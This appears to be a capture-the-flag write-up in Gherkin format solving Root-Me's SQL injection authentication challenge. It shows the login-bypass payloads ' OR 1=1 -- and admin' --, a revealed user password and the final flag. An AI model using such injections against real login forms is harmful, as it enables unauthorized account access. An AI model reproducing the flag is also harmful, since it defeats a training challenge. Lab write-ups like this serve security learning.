## Version 2.0
## language: en

Feature: Web server-rootme
  Site:
    rootme
  Category:
    Web server
  User:
    dianaosorio97
  Goal:
    Retrieve the administrator password

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Ubuntu          | 18.04         |
    | Chrome          | 71.0.3578.98-1|
  Machine information:
    Given I am accessing the page
    """
    https://www.root-me.org/es/Challenges/Web-Servidor/
    SQL-injection-authentication
    """
    And I clicked in the start challenge button
    And I see a login form

  Scenario: Success:Get access with username admin
    Given The page is vulnerable to sql injection
    And I try to enter using a true sentence and commenting on the password
    Then I using the following injection
    """
    username: ' OR 1=1 --
    """
    And The page redirects me to the other form
    """
    Authentication v 0.01
    Welcome back user1 !
    Your informations :
    -username: user1
    -password: TYsgv75zgtq
    """
    Then I see that it is not the flag but that the injection works
    Then I use a injection with another user
    Then I using the following injection
    """
    username: admin' --
    """
    And I see the following message
    """
    Hi master ! To validate the challenge use this password
    """
    Then I see the source code
    And I see the flag
    """
    t0_W34k!$
    """
    And I put in the password section
    And I solve the challenge
